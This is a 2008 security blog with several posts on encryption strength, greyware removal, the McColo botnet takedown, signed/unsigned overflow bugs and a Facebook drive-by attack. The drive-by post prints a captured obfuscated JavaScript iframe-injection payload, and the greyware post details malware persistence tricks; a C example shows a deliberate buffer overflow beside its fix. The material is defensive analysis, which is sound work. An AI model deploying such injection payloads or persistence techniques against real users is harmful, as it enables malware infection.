Friday, 21 November 2008

Encryption - How much is enough, how much is too much?

You might expect me to say that everything should be encrypted to the hilt. Well, that would be overkill. No, the trick is finding the right level of encryption.

I have been asked in the past what would happen if someone came up with an unbreakable code. Would that be game over for cryptanalysis? Well, I confess that I am not a specialist in crypto but I feel pretty secure in answering this one. No, it would not be game over because there are already unbreakable codes. One time pad codes are unbreakable without the pad because all possible messages are equally likely – the same cypher text (encrypted version) could decrypt to “Move $1 million to account 43445342” or “I want to buy a painting of a goat” and there is no way to tell which from the cypher text alone. The way to attack those would be to try to recover the pad - the sequence of nonsense that was used to code the plain text into cypher. That could be a very private thing such as a sheet of rice paper held by only two people in the world and eaten before any attempt by a third party to decrypt the code was made. It could be very public, such as letters from a book chosen at random – each day, you advance one page. One of my favourite pencil-and-paper cyphers is the Solitaire cypher, where the order of a pack of cards is used to generate the keystream. It isn't a true one time pad because the keystream can repeat, but it has the charm that the only equipment required is a pencil, a bit of paper and some ordinary playing cards. Shuffle the deck and the key is lost forever.

However, I digress. Popular cyphers used today are things like 3DES (sometimes pronounced Triple-DES) and AES with a 128 bit or 256 bit key. 3DES is very big in the financial world and replaced single DES. Essentially, 3DES does what DES does three times, processing its own output each time. Are they unbreakable? Not quite. DES is fairly easy to break with the right kit. 3DES would just take longer and require more kit. AES256 would theoretically take many millions or even several billion years to crack with a single desktop system – although the 1.105 petaflop/s IBM supercomputer at Los Alamos National Laboratory might manage it a darn sight quicker. Even with that, the process would, on average, take thousands of years. Does your data need to be safe for that long?

That turns out to be one of the important questions. Imagine you are choosing encryption for a password that will be sent across the wire – and let us ignore the use of hashes for the moment. A password is valid for 1 week and then must be changed. The user can change their own password for 1 week after the old password expires. After that, the help desk have to do it. If the encryption is good enough to stand up for more than 2 weeks, then it is good enough. Making it tougher adds nothing. However, the location of a vault is unlikely to change for hundreds of years. That needs to be secret for a lot longer.

Another important question is how sensitive the data actually is. What I bought on Amazon in the last year? You can see that if you want. A trivial encryption such as ROT13 will do the job here. My interactions with my bank and my lawyer? That is more sensitive. 3DES at least. The launch code for ICBMs? Even if they change fairly often, I think that we should use a good strength cypher on those!

However, there is something about encryption that people often don't consider. It does more than hide information from prying eyes. Imagine that I am running a client that is having a conversation with a server. The request is going over the wire, perhaps via SSL, perhaps via some other scheme. I make a request and the request is coded with a shared secret key that we exchanged at the start of the session – and which is only valid for this session. I get a reply and it is junk until it is decrypted using the shared secret. There is nothing odd about that at all. Millions of systems work that way. So, what would happen if someone tried to hijack the session and inject a new request? Unless they have the shared secret, their request will be decoded into meaningless goo. Since the request probably contains an encrypted copy of some sort of sequence number, it would probably fail at the first hurdle. Knowing the shared secret is a big part of proving that I am still the client that I was at the start of the conversation.
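The shape of that check can be sketched in a few lines of C. Everything here is invented for illustration – the `toy_crypt` keystream stands in for a real cipher such as AES, and a real protocol would layer a MAC on top – but it shows why an injected request dies at the first hurdle: without the shared secret, the sequence number decrypts to goo.

```c
#include <stdint.h>
#include <string.h>

/* Toy stream cipher: XOR with a keystream derived from the session
   key. A stand-in for real encryption, purely for illustration. */
void toy_crypt(uint8_t *buf, size_t len, uint32_t key)
{
    for (size_t i = 0; i < len; i++) {
        key = key * 1103515245u + 12345u;   /* toy keystream generator */
        buf[i] ^= (uint8_t)(key >> 16);
    }
}

struct request {
    uint32_t seq;        /* per-session sequence number */
    char     body[12];
};

/* Decrypt an incoming request with the session key and accept it
   only if the sequence number is the one we expect next. */
int accept_request(const uint8_t *wire, size_t len,
                   uint32_t session_key, uint32_t expected_seq)
{
    struct request req;
    if (len != sizeof req)
        return 0;
    memcpy(&req, wire, len);
    toy_crypt((uint8_t *)&req, len, session_key);
    return req.seq == expected_seq;   /* a hijacker's goo fails here */
}
```

An attacker who does not hold the session key cannot produce a request whose decrypted sequence number comes out right, so the forgery is rejected before the body is even looked at.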

How about if an attacker tries to replay a recording of the conversation without understanding it? The shared secret is generated per session. They have the wrong one so the replay would fail very early. A well designed protocol can protect pretty effectively against session hijacks but there are always people out there looking for even the narrowest gaps to exploit.

What are the downsides to encryption? Well, there are several. It takes time. If you are reading from a disk encrypted with BitLocker, each byte read from disk will cost you around 30 additional CPU cycles – and blow your processor cache and pipeline. Ok, that is not the end of the world but it is a cost. How about data loss though? Bob has excellent data security. All of his files are stored on a machine protected by TrueCrypt, all of his mail goes via PGP and all of his ZIP files and documents have strong passwords. If Bob is a paragon of virtue then the risk is that he will be hit by a bus and that data will be lost. That could be very serious indeed. Of course, it might be that Bob is not a paragon of virtue in which case, how would anyone find out?

I recall that the police were not at all happy when BitLocker came out. Several of them at the F3 conference (First Forensic Forum) described it as a paedophile's best friend since it made offline forensics so hard to do. Encryption is a tool and like pretty much all tools, it is morally neutral. It protects good and bad people equally well. Some would argue that those who have nothing to hide need not keep secrets but I am not so sure. If I share my data with (for example) the government because it is not encrypted from them then I am relying on their ability to keep my data as safe as I have or better. Given their past performance on this, I think that I will encrypt it myself, thank you.

Signing off

Mark Long, Digital Looking Glass

Monday, 17 November 2008

Ooh, ooh, ohh, ohh, Staying Alive!

Ah, who can forget the BeeGees? I try and try. No, there is a point to the title of this blog entry. If you work with computers (a fairly safe assumption if you read this blog) then you will doubtless be familiar with the casual “You know, my computer has been acting weird. Would you mind having a look at it?”. There is a song by Tom Smith called “Doing tech support for Dad” about it. Guess what I did at the weekend? Sometimes I am lucky and the person has some interesting malware. In this case, it was interesting greyware.
Now, is greyware a class of malware? Back at Microsoft, the lawyer-approved phrase was “potentially unwanted software” because it was often software which had been installed after the user agreed to some EULA that said on page seven that it might just send details of your web usage to a server somewhere and might show you ads for products of dubious authenticity. The lawyer’s position is that you can’t call it malware if the user agreed to install it.
So, what did we have here? A typical family system running XP Home edition, not too much memory and an older specification with all members of the family being admins on the system. Under the circumstances, the machine was remarkably clean. It was running a free AV product that had picked up that one of the DLLs loaded into every process was dodgy but every time it tried to fix it, it failed.

I spent a good few hours looking at this particular greyware (and for legal reasons, no names will be given here) and it was a resilient little devil. I would like to talk about some of the tactics that it used. However, before I do that, I would like to talk about coding styles in malware.
There are some fairly distinct styles in malware writing. The script kiddie and those just up from there typically lash components from different sources together into a crude botch and you can’t tell much about the kiddie.

Eastern European black hats are quite workmanlike and the code quality is generally pretty good. They have clearly had formal training. They often borrow ideas off other malware writers, possibly those working for the same stable, but I suspect that they pinch ideas off rival gangs just as often. They keep up with modern trends or set them. They generally write stealthy code with some excellent use of rootkits. Conversely, they do relatively little to hide their infrastructure and looking at the network activity generally takes you to Russia or the Ukraine in fairly short order. That could well represent a difference between the developers and the money men who coordinate gang activities. I am told that military malware from Eastern Europe follows the same patterns but it is better engineered and doesn’t lead as directly back to Eastern Europe.

I have only seen a fairly limited range of military malware from the Middle East but the quality was excellent and the stealth features were even better than the Eastern European code. They clearly worked in teams with subject matter experts writing different bits of the code. A lot of money had been spent on those projects.

Chinese malware uses a very different approach. It rarely has much stealth capacity. Instead, it overwhelms by sheer weight of numbers. If two variants of the code are good, then ten are better. If one protection mechanism is good, then five are better. I am told by friends who move in places where true names are rarely given and all the players work for organisations known only by 3 letter acronyms that Chinese espionage works in very much the same way. Ten agents watching are better than two.
Anyway, I digress. This greyware proved to be Chinese and I had guessed as much from the approach. The directory where it lived was visible which made life easy… well, actually, not so much. Any attempt to delete the directory failed with a sharing violation if it held a code component – oh, I may just call any such files “PE files”, which stands for Portable Executable. This covers any sort of file that can be loaded and run as native code. So, something was locking the files. A quick search showed a process that was loaded from the same directory as the other known files, so I tried to kill it with Task Manager but it wouldn’t die. Ok, time for the toolbox to come out. Although Sysinternals is wholly owned by Microsoft, the tools are still free and wonderful. I downloaded them and Process Explorer killed the process just fine. It was offline for less than 5 seconds before it popped up again. A check of the parent process showed it to be an instance of SVCHOST. Right, it was time to look at the services.
There were a couple of services that seemed to be stopped… how could a stopped service be doing this? I downloaded WinDbg and had a look at the service host for that service and clearly it was not stopped. I am going to look into this technique some more when I have time but it is clear that the SCM was sending service control messages which the service claimed to be processing but the status codes that it returned were out and out lies. However, that was not a problem. I could force terminate the containing service. It popped back up again, spawned by another instance of SVCHOST. Ah, ok, I had seen that trick before. Two processes each have a thread that waits on the death of its brother process. If you kill one then the thread unblocks, restarts its brother process and blocks again. The brother does the same. I knew how to deal with that thanks to Mark Russinovich, a very clever and helpful chap who it was my pleasure to meet once or twice. You can suspend all the threads in a process and that doesn’t trigger the brother process – after all, the monitored process is only sleeping, not dead. You suspend the other process and you have two frozen malicious processes. I went into the registry and killed the startup for those services and rebooted.
What the heck? Everything was back as it had been. Some investigation showed that there was a process that “repaired” the installation of the malware on each boot and then terminated. Ok, not a problem. I froze everything and used Autoruns to disable the loading of the process. Reboot – and everything is back as it had been. Resilient little sucker, isn’t it? Some ferreting around showed that this greyware registered as a shell extension and may well have had some shell functionality but the first thing that it tried to do was repair the install. It was at this point that I realised that this was more interesting than average. I started to dig deeper.

COM classes were registered with multiple different class IDs. Whichever you asked for, you got the same VTABLE. Cute. There were multiple self repair mechanisms and hooks into the system which seemed to exist solely to give the greyware a chance to self repair. Nice idea. The one that made me laugh was the protection for non-PE files. Something was waiting on each file in the directory and as the file was deleted, it just copied the file from the complete backup directory that was right there in plain sight. What happened if you tried to kill the backup directory? It was restored from the live copy.

So, the approach was clearly Chinese but the modules were compiled in Visual Studio with US settings. I was able to fish out some function names and other text and the writer clearly had a very good grasp of English. The servers that sourced the ads were in mainland China and some of the reporting went to Taiwan. All in all, this was pretty good work and much more resilient than most. There was no way that an average admin would have been able to remove this software.

In the end, I cleaned the system by booting to a WinPE image, manually clearing out the registry entries and deleting the directories that contained the greyware. Even the best self defence mechanisms don’t work when they are not loaded.

Had it been a commercial system, it would probably have made more sense to salvage the data and rebuild the box.
Oh, in other news, Arbor Networks say that there have been more and heavier distributed denial of service attacks this year than ever before, with a peak intensity 67% above the previous high. The source? That would be botnets… generally compromised home systems just like the one that I worked on this weekend.

So, until next time…

Signing off

Mark Long, Digital Looking Glass

Friday, 14 November 2008

Directions in cybercrime

Something is missing today. What is it? Hundreds of millions of unwanted SPAM emails. A California based hosting company, McColo Corp, had their servers blocked from the web and the volumes of SPAM nearly halved. The move seems to have been largely orchestrated by journalists and Google.

Google has a cached copy of the McColo terms of use. The following (copyright McColo and quoted as fair use) is from there:

I) Prohibited Uses
A. Utilize the Services to send mass unsolicited e-mail to third parties.

B. Utilize the Services in connection with any illegal activity. Without limiting the general application of this rule, Users may not:

(i) Utilize the Services to copy material from third parties (including text, graphics, music, videos or other copyrightable material) without proper authorization.

(ii) Utilize the Services to misappropriate or infringe the patents, copyrights, trademarks or other intellectual property rights of any third party.

(iii) Utilize the Services to traffic in illegal drugs, illegal gambling, obscene materials or other any products or services that are prohibited under applicable law.


(viii) Utilize the Services to distribute, advertise or promote software or services that have the primary purpose of encouraging or facilitating unsolicited commercial e-mail or spam.

(ix) Utilize the Services to solicit or collect, or distribute, advertise or promote, e-mail address lists for the purpose of encouraging or facilitating unsolicited commercial e-mail or spam.

(x) McColo has no restrictions on contents. Adult materials, MP3s, games, and audio/video streaming are permitted. However, customers are strictly prohibited from using egg-drops, IRC bots, warez materials and shell hosting services on McColo regular network. IRC BOT controllers are not allowed on both networks.

Oh dear... It seems that they have not been enforcing these very well at all. It seems that IRC traffic used to control botnets has routinely been routed through McColo servers. Host Exploit are making a lot of the running on this one and they claim that the payment servers for at least 40 child porn sites are being run through McColo. McColo have no restrictions on content indeed. Here is a link to a Washington Post document listing what McColo have apparently been up to. SRIZBI, the world's biggest botnet, is on there and is apparently currently uncontrolled.

An earlier disconnection (technically a depeering) of the Atrivo / Intercage servers produced a short term drop of 10% in SPAM. How short term? About 3-5 days. I would expect the drop caused by taking McColo off the air to take a little longer because there are presumably more botnets being controlled. So, what happens next?

In the short term, I see a scramble to regain control over the botnets that have been severed from their command and control systems. We may even see some of them change hands although it is increasingly clear that many of the individual gangs ultimately serve the same master.

What about the longer term? Well, I would have thought that the gangs behind the SPAM engines would be looking to safeguard their operations. In the past, the IRC control channels (and there are other channels which I can discuss if anyone is interested) have tended to go via smaller independent IRC servers whose operators have been reluctant to terminate the control channels since doing so often earned them a DDoS attack - that is to say that the botnets would be turned on them as punishment. Attacks against the control channel have largely been limited to killing the channel and hoping no-one minded all that much. By taking out whole server farms at a stroke, things have ratcheted up a whole lot. I would have thought that the botmasters would be looking to move their command mechanisms somewhere much more under their control. Emil Kacperski who ran the Atrivo / Intercage organisation and Vladimir Tsastsin who ran EstDomains may or may not have been associated with the known rogue Russian Business Network - who am I to want a libel case? Certainly, many of the operations that McColo have been hosting were formerly hosted or controlled by the now depeered Russian Business Network. So, moving operations into the west was a solution to a previous problem.

This makes things interesting. If the illegal parts are all in Russia, Estonia and the Ukraine, it is fairly easy to target them as they are concentrated in one geographic area and it is possible to effectively filter traffic although not necessarily good for international relations. If they are centered in the west then the legal framework makes it easy to shut down the operations and that is not what organised crime wants. China? They have their own agenda and it would be even easier to filter the traffic. Africa? Not a lot of bandwidth in the less controlled areas and too much law in the well controlled bits.

Now, what would I do if I were a cyber criminal? Well, they keep knocking out my single points of failure. That happened before so they built in mechanisms to cope with the loss of a single IRC channel. Now the opposition are axing whole server farms. Maybe it is time to abandon centralised control in the same way that the Storm botnet did. Ok, Storm was effectively killed by the Microsoft Malicious Software Removal Tool but it took a long time to die. What if there were multiple Storm type peer to peer botnets? Presumably Microsoft would still kill them off and they would have a limited lifespan - but isn't living defined as not dying for one more day, every day? That is what I would be working on if I were a black hat.
As for how the payment side for illegal content will be handled, I wouldn't like to guess. All that I can say is that we are living in interesting times indeed.

I was asked a question by a client this week. She wondered what I thought the effect of the recession would be on cybercrime. Clearly, legitimate businesses are having to tighten their collective belts. Traditionally, SPAM has been used to sell fake medications, specifically Viagra and Cialis, and dubious services such as penis enlargement guides. These can be seen as luxury goods. We may see the mix changing, and adverts for treatments for high blood pressure and other necessary medications may start to dominate. Much of the Viagra sold over SPAM is fake and has never seen the inside of Pfizer's plant. What would happen if people bought fake medicines for life threatening conditions? You know that criminals would sell them.

As for more targeted attacks such as industrial espionage, well, the criminals will do what we all do when profits are lower. They will work harder.

Speaking of which, I have a report to write.

Signing off

Mark Long, Digital Looking Glass

Wednesday, 12 November 2008

Hey, it is only a warning. How important can it be?

Caveat – only of interest to C or C++ devs today.

You might think that compiler warnings are just nagging. Well, that is mostly true. If you are in a relationship, you may well have been nagged to do the washing up or empty the kitchen bin at some point. Some nagging has a point.

I am going to be talking here about the Microsoft compilers because those are the ones that I know best but the same principles apply to other compilers and even code checkers like Lint. Ah, those happy days when we could name tools in ways that amused us. Lint picked fluff from your code and you used DDT to kill bugs. Anyway, I digress. Compilers allow you to set the warning level that they compile your code against. If you do certain things, you will get warned. I want to talk about some of those warnings.

So, let us look at one that it is probably OK to ignore:

Compiler Warning (level 4) C4201
Error Message : nonstandard extension used : nameless struct/union

Ok, this just means that you have used something which is not supported by ANSI C++. Maybe you need this to be multiplatform in which case that is probably a bad thing. Maybe you plan to change compiler at some point in the future (which I only recommend for masochists) and you want the code to stay as portable as possible. Maybe your contract demands that you use ANSI level C++ for compliance reasons. This is a minor warning but there are some pretty good reasons for at least considering what it is telling you.

How about one that we should worry about?

Compiler Warning (level 3) C4018
Error Message: 'expression' : signed/unsigned mismatch

This one has some brothers and sisters but they have the same basic pattern. You treat something as a signed and an unsigned value. Ah, but you know that the value will only ever be 0 to 40 and so what does it matter? Well, quite a bit. Let me explain how.

Imagine that we have an application that reads a data file and makes sense of it. There are millions of applications like that. So, the data is coming from a file. Further imagine that we have a buffer which is 100 bytes long – it is char[100] so elements 0 to 99 are fine. We are going to fill it from a structure that has been passed to us. You have an integer which holds the length of the data and a pointer to part of the file. You check that the length is less than 101. Yes it is. You read that many bytes from the file and copy them into the array. You go on and do the next thing. All is well and there are millions of bits of code that do just that.

Why do you check the length? Because you don’t want to overflow the buffer. However, what happens if the length that is read from the file is -10,000 rather than 42, for example? Well, -10,000 is less than 101 so that check passes. The routine that reads the file takes an unsigned value, so as a 16 bit unsigned number -10,000 becomes 0xD8F0, a much larger number, 55536 to be precise. So, you read 55536 bytes from the file and copy them into the 100 byte array. Oops, that is the stack gone. If you are lucky, you will crash and your user will curse your name. However, that could only happen with a corrupt file since you also write the files and there are never negative lengths in there. It is, accordingly, a purely theoretical risk right up until someone writes a malicious file and mails it to your customer. Odds on, this will be a remote code execution vulnerability. It happened with dozens of products from Adobe, Microsoft and many other household names. Linux and Unix have both had this one over and over and smarter people than me missed it.
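Here is the pattern in miniature – a hypothetical record reader, with the broken length check and one way to fix it:

```c
#include <string.h>

#define BUF_LEN 100

/* BROKEN: len is signed, so a malicious length of -10000 sails
   straight past the bounds check... */
void read_record_broken(const unsigned char *file_data, int len)
{
    char buf[BUF_LEN];
    if (len > BUF_LEN)
        return;
    /* ...and is then implicitly converted to the unsigned size_t
       that memcpy takes, becoming a huge positive number.
       Stack smashed. */
    memcpy(buf, file_data, len);
}

/* FIXED: reject negative lengths explicitly (or better, carry the
   length in an unsigned type from the moment it is read). */
int read_record(const unsigned char *file_data, int len, char *buf)
{
    if (len < 0 || len > BUF_LEN)
        return -1;
    memcpy(buf, file_data, (size_t)len);
    return 0;
}
```

The silent signed-to-unsigned conversion at the memcpy call is exactly the kind of thing C4018 and its siblings exist to make you look at.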

My recommendation is that you compile all production code at the maximum warning level and document any warnings that you can’t get rid of. I would even go so far as to say that compiler warnings should be logged as bugs so that they get fixed in the next version. You might think otherwise and that is your right... and I will sell you or your client my services when you or they hit problems as a result.

Signing off

Mark Long, Digital Looking Glass

Thursday, 6 November 2008

Drive-by attacks, not just for the physical world

Drive-by attacks are a common way of infecting home PCs. I have mentioned them before but they are still just as popular as they were. There seem to be some changes in the approach though.

We used to routinely see attempts to infect PCs via remote code execution vulnerabilities in the browser – this was one of the holy grails for black hats. If you had one of those, you could have a “click and you are owned” scenario. The other holy grail was a remote code execution in a service that allowed anonymous exploitation – that is to say that a particular request could be made without needing to be sent from an authorised domain account. This would enable a black hat to write a worm but I digress; we are talking about drive-by attacks.

What I used to see often is that the page that was passed back to the browser in response to the GET request would be targeted at the browser version and the vulnerabilities that were current or recently patched. Storm used to do this, even creating custom binaries on the fly. Now, there was a fancy malware for you. What I am seeing more and more is that drive-bys just rely on social engineering. Here is the anatomy of a particular attack:

The come on:

These vary but a fairly common form (and the one that I was looking at) is a message on facebook claiming that someone has pictures or a video of you. It seems to come from a friend but it is very nonspecific – well, it is a hijacked account and the method is to send many of these messages and expect a low success rate. Again, that is fine since none of this cost the black hats anything.
Typically, the link will go via Google (with a unique search string) or sometimes TinyURL. Most people see the start of the URL as going to a reasonable site and follow the link if they look at all. Many don’t; these are home users.

The initial page:

This will typically just be a page of Javascript. I have seen many dozens of variants but they generally look very similar. There is a large static array of values and then a bit of JScript that decodes the array into a string. The encryption is crude in every way. Typically the array will be ASCII values with a largish offset – say 605. It is easy for the black hat to choose a different offset which means that it is not practical for pattern recognition internet security packages to look for a given pattern of values. Also, there are more ways of phrasing the code than one so the pattern is trivial to change.
The string created is then pushed through the eval function.

The payload 1:

Here is the code that it executes:

function uybhutgyaalih(query){
var url = 'http://(malicious URL)/go.php?sid=4';
if (window.XMLHttpRequest){
var dx = '1500px';
document.getElementById('o').innerHTML = '(iframe border=0 scrolling=no width=100% height=2800px src='+url+')(/iframe)';
}else if(window.ActiveXObject){
var dx = '1500px';
document.getElementById('o').innerHTML = '(iframe border=0 scrolling=no width=100% height=2800px src='+url+')(/iframe)';
}
}

Well, nothing too clever there. It takes you to another site via an iframe. Why an iframe? Because no URL will be displayed. I have obscured the URL here but there are thousands of hosts out there. Many of them are listed here. Oh, and I replaced the angle brackets with round ones because they confused the Blogspot editor.

The payload 2:

This is where the link in the iframe takes you. This is where you would expect all the cleverness to be. In this case, nothing at all clever. There was a web page with a video that was (in this case) audio only. Typically, there will be the sound track of something, often a porn film. I haven’t the expertise to identify the film from the sounds. Sorry. There was a bitmap shown over the video that said that there was a missing video codec and seemed to be a typical OK/cancel dialog for XP. In fact, the whole thing was a bitmap and clicking anywhere would download the EXE installer that would give you a nice fresh copy of an Rbot variant.

So, there was nothing at all odd or especially bright about this attack. It was a typical drive-by based on social engineering. Why do the gangs use such a simple approach? Well, that would be because it works just fine. Anything more would be an unnecessary expense.

Oh, I mentioned wormable vulnerabilities. What we saw in the past was rapidly spreading worms, typically malicious and without much of a payload, although SDBot was an exception – it was actually a proper trojan client (bot) with multiple modes of operation though it was mostly used for SPAM. Anyway, traditionally worms would spread so aggressively that they would effectively form a denial of service on the network and stop their own spread. Even if the network stayed up, admins were alerted very rapidly because of the abnormal network load. We might see fast spreading worms again but I think that they will be from amateurs. I think that the professionals will go for low and slow next time. You really want to infect as much of the network as possible before detection – and I would expect the worm to install a proper multi-purpose bot, probably polymorphic to survive better – and possibly based on Storm’s peer to peer architecture to make it more robust.

Are there interesting times ahead? I suspect so.

Signing off

Mark Long, Digital Looking Glass